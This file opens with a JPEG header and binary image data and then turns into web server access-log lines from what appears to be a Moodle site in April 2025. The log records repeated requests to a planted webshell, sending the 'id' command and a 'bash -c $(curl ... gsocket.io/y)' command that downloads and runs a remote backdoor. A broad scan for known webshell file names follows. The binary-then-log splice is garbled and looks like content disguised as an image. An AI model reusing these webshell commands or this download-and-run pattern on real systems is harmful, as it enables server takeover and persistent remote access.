ÿØÿà JFIF 

  
 
  ÿÛ „ 	 ( %"1!%)+...383,7(-.+




-+++--++++---+-+-----+---------------+---+-++7-----ÿÀ  ß â
" 

ÿÄ   

           
 ÿÄ H 
     
 !1AQaq"‘¡2B±ÁÑð#R“Ò Tbr‚²á3csƒ’ÂñDS¢³$CÿÄ 
 


            
ÿÄ %

 
       
!1AQa"23‘ÿÚ 
  ? ôÿ ¨pŸªáÿ —åYõõ\?àÒü©ŠÄï¨pŸªáÿ —åYõõ\?àÓü©ŠÄá 0Ÿªáÿ Ÿå[úƒ	ú®ði~TÁb
qÐ8OÕpÿ ƒOò¤Oè`–RÂáœá™êi€ßÉ< FtŸI“öÌ8úDf´°å}“¾œ6
öFá°y¥jñÇh†ˆ¢ã/ÃÐ:ªcÈ
"Y¡ðÑl>ÿ ”ÏËte:qž\oäŠe÷󲍷˜HT4&ÿ ÓÐü6ö®¿øþßèô	Ÿ•7Ñi’•j|“ñì>b…þS?*Óôÿ ÓÐü*h¥£ír¶ü UãSç‚Ÿ[AÐaè[ûª•õ&õj?†Éö+EzP—WeÒírJFt	‘BŒ†Ï‡%#tE Øz ¥OÛ«!1›üä±Í™%º<!vB™'èÔ6´Ña¿«e`Àà0U[-ÂБ4)M÷YK*³hï÷%ÎÎkÇ«m‘-íWŽLsã?nÂ~«†üö®þ¡ÂlÃaÿ ‰ÿ l©°Õ¥ åÜá¿r ºL[Çâ°(Çè'Vãôl8´ÏRÀvLvPõ:…ÙNçF™÷ë>Íãö]°î(–:@<‹ŒÊö×òÆt¦ãº+‡¦%ÌÁ²h´OƒJŒtMÜ>ÀÜÊw3
Y´•牋4ǍýʏTì>œú=Íwhyë,¾Ôò×õ¿ßÊa»«þˆѪQ|%6ž™A	õ%:øj<>É—ÿ Å_ˆCbõ¥š±ý¯Ýƒï…¶|RëócÍf溪“t.СøTÿ *Ä¿-{†çàczůŽ_–^XþŒ±miB[X±d 1,é”zEù»&
î9gœf™9Ð'.;—™i}!ôšåîqêÛ٤ёý£½ÆA–àôe"A$˝Úsäÿ 
÷Û	#°xŸëí(l
	 »ý3—¥5m!
rt`†0~'j2(]S¦¦kv,ÚÇl¦øJA£Šƒ
J3E8ÙiŽ:cÉžúeZ°€¯\®kÖ(79«Ž:¯X”¾³Š&¡* ….‰Ž(ÜíŸ2¥ª‡×Hi²TF¤ò[¨íÈRëÉ䢍mgÑ.Ÿ<öäS0í„ǹÁU´f#Vß;Õ–…P@3ío<ä-±»Ž.L|kªÀê›fÂ6@»eu‚|ÓaÞÆŸ…¨ááå>åŠ?cKü6ùTÍÆ”†sĤÚ;H2RÚ†õ\Ö·Ÿn'¾ ñ#ºI¤Å´%çÁ­‚â7›‹qT3Iï¨Ö
Ú5I7Ë!ÅOóŸ¶øÝñØôת¦$Tcö‘[«Ö³šÒ';Aþ ¸èíg
A2Z
"i¸vdÄ÷.iõ®§)¿]¤À†–‡É&ä{V¶iŽ”.Ó×Õÿ û?h¬Mt–íª[ÿ Ñÿ ÌV(í}=ibÔ¡›¥¢±b
 Lô¥‡piη_Z<‡z§èŒ)iÖwiÇ 2hÙ3·=’d÷8éŽ1¦¸c¤µ€7›7Ø	ð\á)}	¹fËí›pAÃL%âc2 í§æQz¿;T8sæ°qø)QFMð‰XŒÂ±
N¢aF¨…8¯!U		Z©RÊ ÖPVÄÀÍin™Ì-GˆªÅËŠ›•zË}º±ŽÍFò¹}Uw×#ä5B¤{î}Ð<ÙD
é©¤&‡ïDbàÁôMÁ.66.249.66.18 - - [13/Apr/2025:18:23:31 +0300] "GET / HTTP/1.1" 302 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.65.236.215 - - [13/Apr/2025:19:17:27 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [13/Apr/2025:19:00:57 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [13/Apr/2025:19:01:12 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [13/Apr/2025:19:17:16 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [13/Apr/2025:19:42:54 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [13/Apr/2025:19:43:02 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [13/Apr/2025:20:35:41 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
213.180.203.193 - - [13/Apr/2025:20:46:07 +0300] "GET /pluginfile.php/1/theme_adaptable/favicon/1593683634/logo.png HTTP/1.1" 303 743 "-" "Mozilla/5.0 (compatible; YandexFavicons/1.0; +http://yandex.com/bots)"
103.65.236.215 - - [13/Apr/2025:20:46:39 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [13/Apr/2025:20:46:55 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
129.151.180.193 - - [13/Apr/2025:20:47:00 +0300] "GET / HTTP/1.1" 303 743 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.91 Safari/537.36"
129.151.180.193 - - [13/Apr/2025:20:47:04 +0300] "GET / HTTP/1.1" 303 743 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
103.65.236.215 - - [13/Apr/2025:20:36:33 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
213.180.203.233 - - [13/Apr/2025:20:46:06 +0300] "GET /robots.txt HTTP/1.1" 404 796 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
129.151.180.193 - - [13/Apr/2025:20:46:58 +0300] "GET / HTTP/1.1" 303 743 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.54 Safari/537.36"
129.151.180.193 - - [13/Apr/2025:20:47:02 +0300] "GET / HTTP/1.1" 303 743 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.91 Safari/537.36"
129.151.180.193 - - [13/Apr/2025:20:47:06 +0300] "GET / HTTP/1.1" 303 743 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.54 Safari/537.36"
103.65.236.215 - - [13/Apr/2025:20:51:38 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [13/Apr/2025:20:51:55 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
157.245.106.4 - - [13/Apr/2025:21:34:46 +0300] "GET /pluginfile.php/1/theme_adaptable/logo/1601459808/logo4.png HTTP/1.1" 303 627 "-" "amp-wp, v2.5.5, https://newsblaze.co.ke"
157.245.106.4 - - [13/Apr/2025:21:34:46 +0300] "GET /pluginfile.php/1/theme_adaptable/p1/1601459808/elearning.jpg HTTP/1.1" 303 627 "-" "amp-wp, v2.5.5, https://newsblaze.co.ke"
103.65.236.215 - - [13/Apr/2025:21:53:52 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [13/Apr/2025:22:31:22 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [13/Apr/2025:22:31:51 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
52.164.123.168 - - [13/Apr/2025:22:32:36 +0300] "GET /.well-known/acme-challenge/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:36 +0300] "GET /.well-known/acme-challenge/admin.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:36 +0300] "GET /.well-known/acme-challenge/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:36 +0300] "GET /.well-known/acme-challenge/shop.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:36 +0300] "GET /.well-known/acme-challenge/sxo.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:36 +0300] "GET /.well-known/acme-challenge/worksec.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:36 +0300] "GET /.well-known/admin.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:36 +0300] "GET /.well-known/afcsthua.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:36 +0300] "GET /.well-known/apap.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:36 +0300] "GET /.well-known/awraulub.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:36 +0300] "GET /.well-known/bqdoemhl.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:36 +0300] "GET /.well-known/cihjbmjk.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:36 +0300] "GET /.well-known/classwithtostring.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:36 +0300] "GET /.well-known/eror.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /.well-known/esjmskva.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /.well-known/fm.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /.well-known/gecko-litespeed.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /.well-known/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /.well-known/info.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /.well-known/ktlldmmx.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /.well-known/mfeypwze.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /.well-known/nzhlgkwk.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /.well-known/oduexytv.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /.well-known/pki-validation/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /.well-known/pki-validation/file.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /.well-known/pki-validation/xmrlpc.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /.well-known/tiny.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /.well-known/worksec.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /.well-known/wp-login.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /.well-known/xin1.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /.well-known/zwso.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /1.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /2index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /404.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /aa.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /about.php?525 HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /about/function.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /about/sxo.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /admin HTTP/1.1" 301 795 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:37 +0300] "GET /admin/ HTTP/1.1" 303 1491 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:42 +0300] "GET /admin.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:42 +0300] "GET /admin/controller/extension/extension/ultra.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:42 +0300] "GET /admin/function.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:42 +0300] "GET /adminer.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:43 +0300] "GET /alfa-rex.php7 HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:43 +0300] "GET /alfanew.php7 HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:43 +0300] "GET /as.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:43 +0300] "GET /as/function.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:43 +0300] "GET /assets/qvbgifxl.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:43 +0300] "GET /autoload_classmap.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:43 +0300] "GET /bak.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:43 +0300] "GET /baxa1.phP8 HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:43 +0300] "GET /baxa1.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:43 +0300] "GET /ccx/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:43 +0300] "GET /cgi-bin/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:43 +0300] "GET /cgi-bin/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:43 +0300] "GET /cgi-bin/wp-login.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:43 +0300] "GET /chosen HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:43 +0300] "GET /chosen.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:43 +0300] "GET /class.api.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:43 +0300] "GET /classwithtostring.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:43 +0300] "GET /click.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:43 +0300] "GET /cloud.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:43 +0300] "GET /comfunctions.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:43 +0300] "GET /config.php HTTP/1.1" 303 1491 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:44 +0300] "GET /cong.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:44 +0300] "GET /content.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:44 +0300] "GET /css/access.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:44 +0300] "GET /css/flower.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:44 +0300] "GET /css/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:44 +0300] "GET /css/nqfvanbd.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:44 +0300] "GET /css/sxo.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:44 +0300] "GET /css/uslipjzt.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:44 +0300] "GET /custom-plugin.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:44 +0300] "GET /db.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:44 +0300] "GET /default.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:44 +0300] "GET /defaults.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:44 +0300] "GET /doc.php HTTP/1.1" 200 0 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:45 +0300] "GET /dropdown.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:45 +0300] "GET /edit.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:45 +0300] "GET /epinyins.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:45 +0300] "GET /erin1.PhP7 HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:45 +0300] "GET /file.php HTTP/1.1" 303 1491 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:45 +0300] "GET /filemanager.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:46 +0300] "GET /files.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:46 +0300] "GET /files/index.php HTTP/1.1" 303 1491 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:46 +0300] "GET /fm.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:47 +0300] "GET /ge.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:47 +0300] "GET /home/function.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:47 +0300] "GET /images/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:47 +0300] "GET /images/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:47 +0300] "GET /images/mzeogsze.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:47 +0300] "GET /images/wp-ok.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:47 +0300] "GET /include/Lurd.class.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:47 +0300] "GET /includes/1975Team.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:47 +0300] "GET /index.php HTTP/1.1" 303 1491 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:48 +0300] "GET /index/function.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:48 +0300] "GET /ini.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:48 +0300] "GET /inputs.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:48 +0300] "GET /install.php HTTP/1.1" 302 0 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:48 +0300] "GET /admin/index.php?lang=en HTTP/1.1" 303 1491 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:49 +0300] "GET /ioxi002.PhP7 HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:49 +0300] "GET /item.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:49 +0300] "GET /k.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:49 +0300] "GET /l/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:49 +0300] "GET /link.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:49 +0300] "GET /log.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:49 +0300] "GET /login.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:49 +0300] "GET /login/files.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:49 +0300] "GET /lv.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:49 +0300] "GET /mah.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:49 +0300] "GET /mail.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:49 +0300] "GET /makeasmtp.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:49 +0300] "GET /mar.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:49 +0300] "GET /mini.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:49 +0300] "GET /moderation.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:49 +0300] "GET /moon.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:49 +0300] "GET /new.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:49 +0300] "GET /ok.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /options.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /ova-tools.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /post.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /public/makeasmtp.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /radio.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /randkeyword.PhP7 HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /repeater.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /shell.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /simple.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /simple/function.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /st.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /sxo.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /system_log.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /templates/atomic/templates.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /templates/beez3/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /test.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /themes.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /themes/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /tiny.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /tinyfilemanager.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /tools.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /ty.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /up.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /update/upload.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /upload.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /user.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /v.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /vendor/phpunit/phpunit/src/Util/PHP/ffl82xdf59.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /wikindex.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /worksec.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /wp-2019.php HTTP/1.1" 404 796 "-" "-"
